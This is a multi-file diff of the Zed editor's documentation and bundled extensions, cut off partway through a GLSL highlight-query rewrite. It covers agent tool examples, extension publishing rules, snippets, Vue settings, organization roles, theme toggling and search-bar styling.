To view your current usage, you can visit your account at [dashboard.zed.dev/account](https://dashboard.zed.dev/account). Information from our metering and billing provider, Orb, is embedded on that page.
## Spend Limits {#usage-spend-limits}
@@ -25,7 +27,9 @@ At the top of [the Account page](https://dashboard.zed.dev/account), you'll find
The default value for all Pro users is $10, for a total monthly spend with Zed of $20 ($10 for your Pro subscription, $10 in incremental token spend). This can be set to $0 to limit your spend with Zed to exactly $10/month. If you adjust this limit _higher_ than $10 and consume more than $10 of incremental token spend, you'll be billed via [threshold billing](./billing.md#threshold-billing).
-Once the spend limit is hit, we’ll stop any further usage until your token spend limit resets.
+Once the spend limit is hit, we'll stop any further usage until your token spend limit resets.
+
+> **Note:** Spend limits are a Zed Pro feature. Student plan users do not currently have the ability to configure spend limits; usage is capped at the $10/month included credit.
## Business Usage {#business-usage}
@@ -19,10 +19,14 @@ Gets errors and warnings for either a specific file or the entire project, usefu
When a path is provided, shows all diagnostics for that specific file.
When no path is provided, shows a summary of error and warning counts for all files in the project.
+**Example:** After editing `src/parser.rs`, call `diagnostics` with that path to check for type errors immediately. After a larger refactor touching many files, call it without a path to see a project-wide count of errors before deciding what to fix next.
+
### `fetch`
Fetches a URL and returns the content as Markdown. Useful for providing docs as context.
+**Example:** Fetching a library's changelog page to check whether a breaking API change was introduced in a recent version before writing integration code.
+
### `find_path`
Quickly finds files by matching glob patterns (like "\*_/_.js"), returning matching file paths alphabetically.
@@ -31,6 +35,8 @@ Quickly finds files by matching glob patterns (like "\*_/_.js"), returning match
Searches file contents across the project using regular expressions, preferred for finding symbols in code without knowing exact file paths.
+**Example:** To find every call site of a function before renaming it, search for `parse_config\(` — the regex matches the function name followed by an opening parenthesis, filtering out comments or variable names that happen to contain the string.
+
### `list_directory`
Lists files and directories in a given path, providing an overview of filesystem contents.
@@ -55,6 +61,8 @@ Allows the Agent to work through problems, brainstorm ideas, or plan without exe
Searches the web for information, providing results with snippets and links from relevant web pages, useful for accessing real-time information.
+**Example:** Looking up whether a known bug in a dependency has been patched in a recent release, or finding the current API signature for a third-party library when the local docs are out of date.
+
## Edit Tools
### `copy_path`
@@ -73,6 +81,8 @@ Deletes a file or directory (including contents recursively) at the specified pa
Edits files by replacing specific text with new content.
+**Example:** Updating a function signature — the agent identifies the exact lines to replace and provides the updated version, leaving the surrounding code untouched. For widespread renames, it pairs this with `grep` to find every occurrence first.
+
### `move_path`
Moves or renames a file or directory in the project, performing a rename if only the filename differs.
@@ -89,8 +99,12 @@ Saves files that have unsaved changes. Used when files need to be saved before f
Executes shell commands and returns the combined output, creating a new shell process for each invocation.
+**Example:** After editing a Rust file, run `cargo test --package my_crate 2>&1 | tail -30` to confirm the changes don't break existing tests. Or run `git diff --stat` to review which files have been modified before wrapping up a task.
+
## Other Tools
### `spawn_agent`
-Spawns a subagent with its own context window to perform a delegated task. Each subagent has access to the same tools as the parent agent.
+Spawns a subagent with its own context window to perform a delegated task. Useful for running parallel investigations, completing self-contained tasks, or performing research where only the outcome matters. Each subagent has access to the same tools as the parent agent.
+
+**Example:** While refactoring the authentication module, spawn a subagent to investigate how session tokens are validated elsewhere in the codebase. The parent agent continues its work and reviews the subagent's findings when it completes — keeping both context windows focused on a single task.
@@ -15,11 +15,13 @@ Here's how to make Zed feel like home:
1. **Pick a theme**: Press {#kb theme_selector::Toggle} to open the Theme Selector. Arrow through the list to preview themes in real time, and press Enter to apply.
-2. **Choose an icon theme**: Run `icon theme selector: toggle` from the command palette to browse icon themes.
+2. **Toggle light/dark mode quickly**: Press {#kb theme::ToggleMode}. If you currently use a static `"theme": "..."` value, the first toggle converts it to dynamic mode settings with default themes.
-3. **Set your font**: Open the Settings Editor with {#kb zed::OpenSettings} and search for `buffer_font_family`. Set it to your preferred coding font.
+3. **Choose an icon theme**: Run `icon theme selector: toggle` from the command palette to browse icon themes.
-4. **Adjust font size**: In the same Settings Editor, search for `buffer_font_size` and `ui_font_size` to tweak the editor and interface text sizes.
+4. **Set your font**: Open the Settings Editor with {#kb zed::OpenSettings} and search for `buffer_font_family`. Set it to your preferred coding font.
+
+5. **Adjust font size**: In the same Settings Editor, search for `buffer_font_size` and `ui_font_size` to tweak the editor and interface text sizes.
That's it. You now have a personalized Zed setup.
@@ -2,7 +2,7 @@
This is for moderate-to-large features — new UI, behavior changes, or work that cuts across multiple parts of Zed. Small keybindings or settings tweaks don't need all of this.
-> **Before you start:** If you're an external contributor, make sure the feature is something the team wants before investing significant effort. That said, coming prepared with background research makes it much easier for the team to understand and approve the proposal. Read the [Contributing guide](../../../CONTRIBUTING.md#sending-changes) — if there isn't already a GitHub issue with staff confirmation, start with a GitHub Discussion or a Discord message rather than a PR.
+> **Before you start:** If you're an external contributor, make sure the feature is something the team wants before investing significant effort. Please read the [Contributing Guide](../../../CONTRIBUTING.md) and our [Feature Request Guidelines](https://github.com/zed-industries/zed/discussions/51422) — if there isn't already a GitHub issue with clear staff confirmation, start with a GitHub Discussion. Feature request PRs that skip this process have a _very_ low merge rate. Taking the time to follow our process significantly increases the chances your idea gets picked up and built.
## 1. Why does this matter?
@@ -18,16 +18,20 @@ Write a short, concrete feature statement, then back it up with the context gath
Here's an example format, though adapt it to whatever your feature needs:
-> **Feature:** Inline Git Blame
-> **Purpose:** Show the last commit author and message for each line directly after the editor text, so developers can understand code history without opening the git blame.
-> **Background:**
-> This is standard across all major code editors
-> \[screenshot of VSCode]
-> \[screenshot of Intellij]
-> \[screenshot of Neovim]
-> and has 146 thumbs up on the [github issue](https://github.com).
-> **Decisions:**
-> We have to decide whether to use the git CLI or a git library. Zed uses a git library but its blame implementation is too slow for a code editor, so we should use the CLI's porcelain interface.
+**Feature:** Inline Git Blame
+
+**Purpose:** Show the last commit author and message for each line directly after the editor text, so developers can understand code history without opening the git blame.
+
+**Background:**
+This is standard across all major code editors:
+
+- \[screenshot of VSCode]
+- \[screenshot of Intellij]
+- \[screenshot of Neovim]
+- and has 146 thumbs up on this [github issue](https://github.com).
+
+**Decisions:**
+We have to decide whether to use the git CLI or a git library. Zed uses a git library but its blame implementation is too slow for a code editor, so we should use the CLI's porcelain interface.
## 3. What else does this affect?
@@ -89,7 +89,7 @@ Before making any UI changes, generate baseline images from a known-good state:
```sh
git checkout origin/main
-UPDATE_BASELINE=1 cargo run -p zed --bin visual_test_runner --features visual-tests
+UPDATE_BASELINE=1 cargo run -p zed --bin zed_visual_test_runner --features visual-tests
git checkout -
```
@@ -118,7 +118,8 @@ xcrun: error: unable to find utility "metal", not a developer tool or in PATH
Try `sudo xcode-select --switch /Applications/Xcode.app/Contents/Developer`
-If you're on macOS 26, try `xcodebuild -downloadComponent MetalToolchain`
+If you're on macOS 26, try `xcodebuild -downloadComponent MetalToolchain`.
+If that command fails, run `xcodebuild -runFirstLaunch` and try downloading the toolchain again.
### Cargo errors claiming that a dependency is using unstable features
@@ -14,6 +14,7 @@ Zed lets you add new functionality using user-defined extensions.
- [Developing Debugger Extensions](./extensions/debugger-extensions.md)
- [Developing Themes](./extensions/themes.md)
- [Developing Icon Themes](./extensions/icon-themes.md)
+ - [Developing Snippets](./extensions/snippets.md)
- [Developing Slash Commands](./extensions/slash-commands.md)
- [Developing Agent Servers](./extensions/agent-servers.md)
- [Developing MCP Servers](./extensions/mcp-extensions.md)
@@ -5,7 +5,7 @@ description: "Create Zed extensions: languages, themes, debuggers, slash command
# Developing Extensions {#developing-extensions}
-Zed extensions are Git repositories containing an `extension.toml` manifest. They can provide languages, themes, debuggers, slash commands, and MCP servers.
+Zed extensions are Git repositories containing an `extension.toml` manifest. They can provide languages, themes, debuggers, snippets, slash commands, and MCP servers.
## Extension Features {#extension-features}
@@ -15,6 +15,7 @@ Extensions can provide:
- [Debuggers](./debugger-extensions.md)
- [Themes](./themes.md)
- [Icon Themes](./icon-themes.md)
+- [Snippets](./snippets.md)
- [Slash Commands](./slash-commands.md)
- [MCP Servers](./mcp-extensions.md)
@@ -47,8 +48,6 @@ description = "Example extension"
repository = "https://github.com/your-name/my-zed-extension"
```
-> **Note:** If you are working on a theme extension with the intent to publish it later, suffix your theme extension ID with `-theme`. Otherwise, this may be raised during [extension publishing](#publishing-your-extension).
-
In addition to this, there are several other optional files and directories that can be used to add functionality to a Zed extension. An example directory structure of an extension that provides all capabilities is as follows:
```
@@ -63,6 +62,9 @@ my-extension/
highlights.scm
themes/
my-theme.json
+ snippets/
+ snippets.json
+ rust.json
```
## WebAssembly
@@ -140,7 +142,24 @@ Your license file should be at the root of your extension repository. Any filena
> This license requirement applies only to your extension code itself (the code that gets compiled into the extension binary).
> It does not apply to any tools your extension may download or interact with, such as language servers or other external dependencies.
-> If your repository contains both extension code and other projects (like a language server), you are not required to relicense those other projects—only the extension code needs to be one of the aforementioned accepted licenses.
+> If your repository contains both extension code and other projects (like a language server), you are not required to relicense those other projects — only the extension code needs to be one of the aforementioned accepted licenses.
+
+## Extension Publishing Prerequisites
+
+Before publishing your extension, make sure that you have chosen a unique extension ID for your extension in the [extension manifest](#directory-structure-of-a-zed-extension).
+This will be the primary identifier for your extension and cannot be changed after your extension has been published.
+Also, ensure that you have filled out all the required fields in the manifest.
+
+Furthermore, please make sure that your extension fulfills the following preconditions before you move on to publishing your extension:
+
+- Extension IDs and names must not contain the words `zed`, `Zed` or `extension`, since they are all Zed extensions.
+- Your extension ID should provide some information on what your extension tries to accomplish. E.g. for themes, it should be suffixed with `-theme`, snippet extensions should be suffixed with `-snippets` and so on. An exception to that rule are extensions that provide support for languages or popular tooling that people would expect to find under that ID. You can take a look at the list of [existing extensions](https://github.com/zed-industries/extensions/blob/main/extensions.toml) to get a grasp on how this is usually enforced.
+- Extensions should provide something that is not yet available in the marketplace as opposed to fixing something that could be resolved within an existing extension. For example, if you find that an existing extension's support for a language server is not functioning properly, first try contributing a fix to the existing extension as opposed to submitting a new extension immediately.
+  - If you receive no response or reaction within the upstream repository within a reasonable amount of time, feel free to submit a pull request that aims to fix said issue. When you later open a pull request against the extensions repository to add your extension, please document these previous efforts there. Zed maintainers will then decide on how to proceed on a case by case basis.
+- Extensions that intend to provide a language server, debugger or MCP server must not ship the server binary as part of the extension. Instead, the extension should either download the server or check for its availability in the user's environment using the APIs provided by the [Zed Rust Extension API](https://docs.rs/zed_extension_api/latest/zed_extension_api/).
+- Themes and icon themes should not be published as part of extensions that provide other features, e.g. language support. Instead, they should be published as a distinct extension. This also applies to theme and icon themes living in the same repository.
+
+Note that non-compliance will be raised by reviewers during the publishing process and will delay the release of your extension.
## Publishing your extension
@@ -148,13 +167,15 @@ To publish an extension, open a PR to [the `zed-industries/extensions` repo](htt
In your PR, do the following:
-1. Add your extension as a Git submodule within the `extensions/` directory
+1. Add your extension as a Git submodule within the `extensions/` directory under the `extensions/{extension-id}` path
```sh
-git submodule add https://github.com/your-username/foobar-zed.git extensions/foobar
-git add extensions/foobar
+git submodule add https://github.com/your-username/foobar-zed.git extensions/my-extension
+git add extensions/my-extension
```
+> **Note:** Your extension must live under the `extensions/{extension-id}` path — the directory name must match your extension ID exactly.
+
> All extension submodules must use HTTPS URLs and not SSH URLS (`git@github.com`).
2. Add a new entry to the top-level `extensions.toml` file containing your extension:
@@ -165,14 +186,21 @@ submodule = "extensions/my-extension"
version = "0.0.1"
```
-> If your extension is in a subdirectory within the submodule you can use the `path` field to point to where the extension resides.
+If your extension is in a subdirectory within the submodule, you can use the `path` field to point to where the extension resides:
+
+```toml
+[my-extension]
+submodule = "extensions/my-extension"
+path = "packages/zed"
+version = "0.0.1"
+```
+
+> Note that the [required extension license](#extension-license-requirements) must reside at the specified path; a license at the root of the repository will not work. However, you are free to symlink an existing license within the repository or choose an alternative license from the list of accepted licenses for the extension code.
3. Run `pnpm sort-extensions` to ensure `extensions.toml` and `.gitmodules` are sorted
Once your PR is merged, the extension will be packaged and published to the Zed extension registry.
-> Extension IDs and names should not contain `zed` or `Zed`, since they are all Zed extensions.
-
## Updating an extension
To update an extension, open a PR to [the `zed-industries/extensions` repo](https://github.com/zed-industries/extensions).
@@ -52,7 +52,7 @@ TBD: Document `language_name/config.toml` keys
## Grammar
-Zed uses the [Tree-sitter](https://tree-sitter.github.io) parsing library to provide built-in language-specific features. There are grammars available for many languages, and you can also [develop your own grammar](https://tree-sitter.github.io/tree-sitter/creating-parsers#writing-the-grammar). A growing list of Zed features are built using pattern matching over syntax trees with Tree-sitter queries. As mentioned above, every language that is defined in an extension must specify the name of a Tree-sitter grammar that is used for parsing. These grammars are then registered separately in extensions' `extension.toml` file, like this:
+Zed uses the [Tree-sitter](https://tree-sitter.github.io) parsing library to provide built-in language-specific features. There are grammars available for many languages, and you can also [develop your own grammar](https://tree-sitter.github.io/tree-sitter/creating-parsers/3-writing-the-grammar.html). A growing list of Zed features are built using pattern matching over syntax trees with Tree-sitter queries. As mentioned above, every language that is defined in an extension must specify the name of a Tree-sitter grammar that is used for parsing. These grammars are then registered separately in extensions' `extension.toml` file, like this:
```toml
[grammars.gleam]
@@ -0,0 +1,27 @@
+---
+title: Snippets
+description: "Snippets for Zed extensions."
+---
+
+# Snippets
+
+Extensions may provide snippets for one or more languages.
+
+Each file containing snippets can be specified in the `snippets` field of the `extension.toml` file.
+
+The referenced path must be relative to the `extension.toml`.
+
+## Defining Snippets
+
+A given extension may provide one or more snippets. Each snippet must be registered in the `extension.toml`.
+
+Zed matches snippet files based on the lowercase name of the language (e.g. `rust.json` for Rust).
+You can use `snippets.json` as a file name to define snippets that will be available regardless of the current buffer language.
+
+For example, here is an extension that provides snippets for Rust and TypeScript:
+
+```toml
+snippets = ["./snippets/rust.json", "./snippets/typescript.json"]
+```
+
+For more information on how to create snippets, see the [Snippets documentation](../snippets.md).
@@ -89,7 +89,7 @@ Configure language servers in Settings ({#kb zed::OpenSettings}) under Languages
"languages": {
"Python": {
"language_servers": [
- // Disable basedpyright and enable ty, and include all
+ // Enable ty, disable basedpyright, and enable all
// other registered language servers (ruff, pylsp, pyright).
"ty",
"!basedpyright",
@@ -8,7 +8,59 @@ description: "Configure Vue language support in Zed, including language servers,
Vue support is available through the [Vue extension](https://github.com/zed-extensions/vue).
- Tree-sitter: [tree-sitter-grammars/tree-sitter-vue](https://github.com/tree-sitter-grammars/tree-sitter-vue)
-- Language Server: [vuejs/language-tools/](https://github.com/vuejs/language-tools/)
+- Language Server: [vuejs/language-tools](https://github.com/vuejs/language-tools)
+
+## Initialization Options
+
+### Specifying location of TypeScript SDK
+
+By default, this extension assumes that you are working in a project with a `node_modules` directory, and searches for
+the TypeScript SDK inside that directory.
+
+This may not always be true; for example, when working in a project that uses Yarn PnP, there is no `node_modules`. For
+editor support, the [documented](https://yarnpkg.com/getting-started/editor-sdks) approach is to run something like
+`yarn dlx @yarnpkg/sdks`. In that case, you can provide the following initialization options in your Zed settings:
+
+```json
+{
+ "lsp": {
+ "vue": {
+ "initialization_options": {
+ "typescript": {
+ "tsdk": ".yarn/sdks/typescript/lib"
+ }
+ }
+ }
+ }
+}
+```
+
+## Settings Options
+
+`lsp.vue.settings` is passed through to the Vue language server (Volar / [`vuejs/language-tools`](https://github.com/vuejs/language-tools)). The following settings are enabled by default:
+
+```json
+{
+ "lsp": {
+ "vue": {
+ "settings": {
+ // Display inlay hints for the `$event` parameter in inline event handlers.
+ "vue.inlayHints.inlineHandlerLeading": true,
+ // Display hints when required component props are missing in templates.
+ "vue.inlayHints.missingProps": true,
+ // Display inlay hints for patterns that wrap component options.
+ "vue.inlayHints.optionsWrapper": true,
+ // Display inlay hints related to `v-bind` shorthand (`:`).
+ "vue.inlayHints.vBindShorthand": true
+ }
+ }
+ }
+}
+```
+
+You can find the upstream settings configuration schema [here](https://github.com/vuejs/language-tools/blob/ee5041d27940cf6f9a5150635d3b13140a9dff54/extensions/vscode/package.json#L252).
+
+> Note: Some settings (e.g. `vue.editor.focusMode`) may not take effect.
## Using the Tailwind CSS Language Server with Vue
@@ -1908,6 +1908,14 @@ WARNING: `{buffer_path}` should not be used to direct your formatter to read fro
Here `rust-analyzer` will be used first to format the code, followed by a call of sed.
If any of the formatters fails, the subsequent ones will still be executed.
+6. To disable the formatter, use `"none"`. This setting disables the configured formatter, but any actions in `code_actions_on_format` will still be executed:
+
+```json [settings]
+{
+ "formatter": "none"
+}
+```
+
## Auto close
- Description: Whether to automatically add matching closing characters when typing opening parenthesis, bracket, brace, single or double quote characters.
@@ -4619,7 +4627,8 @@ Run the {#action theme_selector::Toggle} action in the command palette to see a
"show_user_picture": true,
"show_user_menu": true,
"show_sign_in": true,
- "show_menus": false
+ "show_menus": false,
+ "button_layout": "platform_default"
}
}
```
@@ -4634,6 +4643,7 @@ Run the {#action theme_selector::Toggle} action in the command palette to see a
- `show_user_menu`: Whether to show the user menu button in the titlebar (the one that displays your avatar by default and contains options like Settings, Keymap, Themes, etc.)
- `show_sign_in`: Whether to show the sign in button in the titlebar
- `show_menus`: Whether to show the menus in the titlebar
+- `button_layout`: The layout of window control buttons in the title bar (Linux only). Can be set to `"platform_default"` to follow the system setting, `"standard"` to use Zed's built-in layout, or a custom format like `"close:minimize,maximize"`
## Vim
@@ -4695,7 +4705,8 @@ Run the {#action theme_selector::Toggle} action in the command palette to see a
"bold_folder_labels": false,
"drag_and_drop": true,
"scrollbar": {
- "show": null
+ "show": null,
+ "horizontal_scroll": true
},
"sticky_scroll": true,
"show_diagnostics": "all",
@@ -4941,9 +4952,9 @@ Run the {#action theme_selector::Toggle} action in the command palette to see a
}
```
-### Scrollbar: Show
+### Scrollbar
-- Description: Whether to show a scrollbar in the project panel. Possible values: null, "auto", "system", "always", "never". Inherits editor settings when absent, see its description for more details.
+- Description: Scrollbar-related settings for the project panel.
- Setting: `scrollbar`
- Default:
@@ -4951,7 +4962,8 @@ Run the {#action theme_selector::Toggle} action in the command palette to see a
{
"project_panel": {
"scrollbar": {
- "show": null
+ "show": null,
+ "horizontal_scroll": true
}
}
}
@@ -4959,29 +4971,8 @@ Run the {#action theme_selector::Toggle} action in the command palette to see a
**Options**
-1. Show scrollbar in the project panel
-
-```json [settings]
-{
- "project_panel": {
- "scrollbar": {
- "show": "always"
- }
- }
-}
-```
-
-2. Hide scrollbar in the project panel
-
-```json [settings]
-{
- "project_panel": {
- "scrollbar": {
- "show": "never"
- }
- }
-}
-```
+- `show`: Whether to show a scrollbar in the project panel. Possible values: null, "auto", "system", "always", "never". Inherits editor settings when absent, see its description for more details.
+- `horizontal_scroll`: Whether to allow horizontal scrolling in the project panel. When `false`, the view is locked to the leftmost position and long file names are clipped.
### Sort Mode
@@ -5108,7 +5099,8 @@ See the [debugger page](../debugger.md) for more information about debugging sup
"collapse_untracked_diff": false,
"scrollbar": {
"show": null
- }
+ },
+ "starts_open": false
}
}
```
@@ -5123,6 +5115,7 @@ See the [debugger page](../debugger.md) for more information about debugging sup
- `sort_by_path`: Whether to sort entries in the panel by path or by status (the default)
- `collapse_untracked_diff`: Whether to collapse untracked files in the diff panel
- `scrollbar`: When to show the scrollbar in the git panel
+- `starts_open`: Whether the git panel should open on startup
## Git Worktree Directory
@@ -0,0 +1,71 @@
+---
+title: Roles - Zed
+description: Understand Zed's organization roles and what each role can access, manage, and configure.
+---
+
+# Roles
+
+Every member of a Zed organization is assigned a role that determines
+what they can access and configure.
+
+## Role Types {#roles}
+
+Every member of an organization is assigned one of three roles:
+
+| Role | Description |
+| ---------- | ------------------------------------------------------ |
+| **Owner** | Full control, including billing and ownership transfer |
+| **Admin** | Full control, except billing |
+| **Member** | Standard access, no privileged actions |
+
+### Owner {#role-owner}
+
+An owner has full control over the organization, including:
+
+- Invite and remove members
+- Assign and change member roles
+- Manage billing, payment methods, and invoices
+- Configure data-sharing policies
+- Disable Zed's collaborative features
+- Control whether members can use Zed-hosted models and Zed's edit predictions
+- Transfer ownership to another member
+
+### Admin {#role-admin}
+
+Admins have the same capabilities as the Owner, except they cannot:
+
+- Access or modify billing settings
+- Transfer organization ownership
+
+This role is suited for team leads or managers who handle day-to-day
+member access without needing visibility into payment details.
+
+### Member {#role-member}
+
+Members have standard access to Zed. They cannot access billing or
+organization settings.
+
+## Managing User Roles {#managing-users}
+
+Owners and Admins can manage organization members from the Zed
+dashboard within the Members page.
+
+### Inviting Members {#inviting-members}
+
+1. On the Members page, select **+ Invite Member**.
+2. Enter the member's company email address and choose a role.
+3. The invitee receives an email with instructions to join. After
+ accepting, they authenticate via GitHub.
+
+### Changing a Member's Role {#changing-roles}
+
+1. On the Members page, find the member. You can filter by role or
+ search by name.
+2. Open the three-dot menu and select a new role.
+
+### Removing a Member {#removing-members}
+
+1. On the Members page, find the member.
+2. Select **Remove** and confirm.
+
+Removing a member removes their access to organization settings and any organization-managed features. They can continue using Zed on their own.
@@ -50,7 +50,12 @@ Zed supports ways to spawn (and rerun) commands using its integrated [terminal](
// Whether to show the task line in the output of the spawned task, defaults to `true`.
"show_summary": true,
// Whether to show the command line in the output of the spawned task, defaults to `true`.
- "show_command": true
+ "show_command": true,
+ // Which edited buffers to save before running the task:
+ // * `all` — save all edited buffers
+ // * `current` — save current buffer only
+ // * `none` — don't save any buffers
+ "save": "all"
// Represents the tags for inline runnable indicators, or spawning multiple tasks at once.
// "tags": []
}
@@ -89,6 +94,7 @@ These variables allow you to pull information from the current editor and use it
- `ZED_STEM`: stem (filename without extension) of the currently opened file (e.g. `main`)
- `ZED_SYMBOL`: currently selected symbol; should match the last symbol shown in a symbol breadcrumb (e.g. `mod tests > fn test_task_contexts`)
- `ZED_SELECTED_TEXT`: currently selected text
+- `ZED_LANGUAGE`: language of the currently opened buffer (e.g. `Rust`, `Python`, `Shell Script`)
- `ZED_WORKTREE_ROOT`: absolute path to the root of the current worktree. (e.g. `/Users/my-user/path/to/project`)
- `ZED_CUSTOM_RUST_PACKAGE`: (Rust-specific) name of the parent package of $ZED_FILE source file.
@@ -44,6 +44,35 @@ You can set the mode to `"dark"` or `"light"` to ignore the current system mode.
}
```
+### Toggle Theme Mode from the Keyboard
+
+Use {#kb theme::ToggleMode} to switch the current theme mode between light and dark.
+
+If your settings currently use a static theme value, like:
+
+```json [settings]
+{
+ "theme": "Any Theme"
+}
+```
+
+the first toggle converts it to dynamic theme selection with default themes:
+
+```json [settings]
+{
+ "theme": {
+ "mode": "system",
+ "light": "One Light",
+ "dark": "One Dark"
+ }
+}
+```
+
+You are required to set both `light` and `dark` themes manually after the first toggle.
+
+After that, toggling updates only `theme.mode`.
+If `light` and `dark` are the same theme, the first toggle may not produce a visible UI change until you set different values for `light` and `dark`.
+
## Theme Overrides
To override specific attributes of a theme, use the `theme_overrides` setting.
@@ -368,7 +368,10 @@ mark.fade-out {
.searchbar-outer {
margin-inline-start: auto;
margin-inline-end: auto;
+ width: 100%;
max-width: var(--content-max-width);
+ box-sizing: border-box;
+ padding: 16px;
}
#searchbar {
@@ -394,21 +397,21 @@ mark.fade-out {
.searchresults-header {
font-weight: bold;
font-size: 1em;
- padding-block-start: 18px;
+ padding-block-start: 0;
padding-block-end: 0;
- padding-inline-start: 5px;
- padding-inline-end: 0;
color: var(--searchresults-header-fg);
}
ul#searchresults {
list-style: none;
padding-inline-start: 0;
+ margin-block-end: 0;
}
ul#searchresults li {
margin: 10px 0px;
padding: 2px;
border-radius: 2px;
+ scroll-margin-block-end: 10px;
}
ul#searchresults li.focus {
background-color: var(--searchresults-li-bg);
@@ -794,8 +797,7 @@ ul#searchresults span.teaser em {
max-height: 600px;
display: flex;
flex-direction: column;
- padding: 16px;
- overflow-y: auto;
+ overflow-y: hidden;
border-radius: 8px;
background: var(--popover-bg);
@@ -803,8 +805,11 @@ ul#searchresults span.teaser em {
box-shadow: var(--popover-shadow);
}
-.searchbar-outer {
- width: 100%;
+.searchresults-outer {
+ flex: 1;
+ min-height: 0;
+ overflow-y: auto;
+ padding: 0px 22px 22px 22px;
}
#searchbar {
@@ -424,6 +424,31 @@
<script src="{{ path_to_root }}elasticlunr.min.js"></script>
<script src="{{ path_to_root }}mark.min.js"></script>
<script src="{{ path_to_root }}searcher.js"></script>
+
+ <script>
+ (function () {
+      // Check for a focused search result and bring it into view
+ const ensureVisible = () => {
+ const focused = document.querySelector("#searchresults li.focus");
+
+ if (focused) {
+ focused.scrollIntoView({
+ block: "nearest",
+ inline: "nearest"
+ });
+ }
+ };
+
+ // 1. Listen for arrow key events
+ // 2. Wait for DOM to update
+      // 3. Call ensureVisible
+ document.addEventListener("keydown", function (e) {
+ if (e.key === "ArrowDown" || e.key === "ArrowUp") {
+ requestAnimationFrame(ensureVisible);
+ }
+ });
+ })();
+ </script>
{{/if}}
<script src="{{ path_to_root }}clipboard.min.js"></script>
@@ -8,56 +8,10 @@ If you are looking for the Zed extension registry, see the [`zed-industries/exte
Currently, Zed includes support for a number of languages without requiring installing an extension. Those languages can be found under [`crates/languages/src`](https://github.com/zed-industries/zed/tree/main/crates/languages/src).
-Support for all other languages is done via extensions. This directory ([extensions/](https://github.com/zed-industries/zed/tree/main/extensions/)) contains a number of officially maintained extensions. These extensions use the same [zed_extension_api](https://docs.rs/zed_extension_api/latest/zed_extension_api/) available to all [Zed Extensions](https://zed.dev/extensions) for providing [language servers](https://zed.dev/docs/extensions/languages#language-servers), [tree-sitter grammars](https://zed.dev/docs/extensions/languages#grammar) and [tree-sitter queries](https://zed.dev/docs/extensions/languages#tree-sitter-queries).
+Support for all other languages is done via extensions. This directory ([extensions/](https://github.com/zed-industries/zed/tree/main/extensions/)) contains some of the officially maintained extensions. These extensions use the same [zed_extension_api](https://docs.rs/zed_extension_api/latest/zed_extension_api/) available to all [Zed Extensions](https://zed.dev/extensions) for providing [language servers](https://zed.dev/docs/extensions/languages#language-servers), [tree-sitter grammars](https://zed.dev/docs/extensions/languages#grammar) and [tree-sitter queries](https://zed.dev/docs/extensions/languages#tree-sitter-queries).
+
+You can find the other officially maintained extensions in the [zed-extensions organization](https://github.com/zed-extensions).
## Dev Extensions
See the docs for [Developing an Extension Locally](https://zed.dev/docs/extensions/developing-extensions#developing-an-extension-locally) for how to work with one of these extensions.
-
-## Updating
-
-> [!NOTE]
-> This update process is usually handled by Zed staff.
-> Community contributors should just submit a PR (step 1) and we'll take it from there.
-
-The process for updating an extension in this directory has three parts.
-
-1. Create a PR with your changes. (Merge it)
-2. Bump the extension version in:
-
- - extensions/{language_name}/extension.toml
- - extensions/{language_name}/Cargo.toml
- - Cargo.lock
-
- You can do this manually, or with a script:
-
- ```sh
- # Output the current version for a given language
- ./script/language-extension-version <langname>
-
- # Update the version in `extension.toml` and `Cargo.toml` and trigger a `cargo check`
- ./script/language-extension-version <langname> <new_version>
- ```
-
- Commit your changes to a branch, push a PR and merge it.
-
-3. Open a PR to [`zed-industries/extensions`](https://github.com/zed-industries/extensions) repo that updates the extension in question
-
-Edit [`extensions.toml`](https://github.com/zed-industries/extensions/blob/main/extensions.toml) in the extensions repo to reflect the new version you set above and update the submodule latest Zed commit.
-
-```sh
-# Go into your clone of the extensions repo
-cd ../extensions
-
-# Update
-git checkout main
-git pull
-just init-submodule extensions/zed
-
-# Update the Zed submodule
-cd extensions/zed
-git checkout main
-git pull
-cd -
-git add extensions.toml extensions/zed
-```
@@ -1,6 +1,6 @@
[package]
name = "zed_glsl"
-version = "0.2.0"
+version = "0.2.2"
edition.workspace = true
publish.workspace = true
license = "Apache-2.0"
@@ -1,7 +1,7 @@
id = "glsl"
name = "GLSL"
description = "GLSL support."
-version = "0.2.0"
+version = "0.2.2"
schema_version = 1
authors = ["Mikayla Maki <mikayla@zed.dev>"]
repository = "https://github.com/zed-industries/zed"
@@ -5,6 +5,8 @@ path_suffixes = [
"vert", "frag", "tesc", "tese", "geom",
# Compute shaders
"comp",
+ # Mesh pipeline shaders
+ "task", "mesh",
# Ray tracing pipeline shaders
"rgen", "rint", "rahit", "rchit", "rmiss", "rcall",
# Other
@@ -1,108 +1,68 @@
-"break" @keyword
-
-"case" @keyword
-
-"const" @keyword
-
-"continue" @keyword
-
-"default" @keyword
-
-"do" @keyword
-
-"else" @keyword
-
-"enum" @keyword
-
-"extern" @keyword
-
-"for" @keyword
-
-"if" @keyword
-
-"inline" @keyword
-
-"return" @keyword
-
-"sizeof" @keyword
-
-"static" @keyword
-
-"struct" @keyword
-
-"switch" @keyword
-
-"typedef" @keyword
-
-"union" @keyword
-
-"volatile" @keyword
-
-"while" @keyword
-
-"#define" @keyword
-
-"#elif" @keyword
-
-"#else" @keyword
-
-"#endif" @keyword
-
-"#if" @keyword
-
-"#ifdef" @keyword
-
-"#ifndef" @keyword
-
-"#include" @keyword
-
-(preproc_directive) @keyword
-
-"--" @operator
-
-"-" @operator
-
-"-=" @operator
-
-"->" @operator
-
-"=" @operator
-
-"!=" @operator
-
-"*" @operator
-
-"&" @operator
-
-"&&" @operator
-
-"+" @operator
-
-"++" @operator
-
-"+=" @operator
-
-"<" @operator
-
-"==" @operator
-
-">" @operator
-
-"||" @operator
-
-"." @delimiter
-
-";" @delimiter
-
-(string_literal) @string
+[
+ "break"
+ "case"
+ "const"
+ "continue"
+ "default"
+ "do"
+ "else"
+ "enum"
+ "extern"
+ "for"
+ "if"
+ "inline"
+ "return"
+ "sizeof"
+ "static"
+ "struct"
+ "switch"
+ "typedef"
+ "union"
+ "volatile"
+ "while"
+ "#define"
+ "#elif"
+ "#else"
+ "#endif"
+ "#if"
+ "#ifdef"
+ "#ifndef"
+ "#include"
+ (preproc_directive)
+] @keyword
-(system_lib_string) @string
+[
+ "--"
+ "-"
+ "-="
+ "->"
+ "="
+ "!="
+ "*"
+ "&"
+ "&&"
+ "+"
+ "++"
+ "+="
+ "<"
+ "=="
+ ">"
+ "||"
+ "."
+ ";"
+] @operator
-(null) @constant
+[
+ (string_literal)
+ (system_lib_string)
+] @string
-(number_literal) @number
+(null) @constant.builtin
-(char_literal) @number
+[
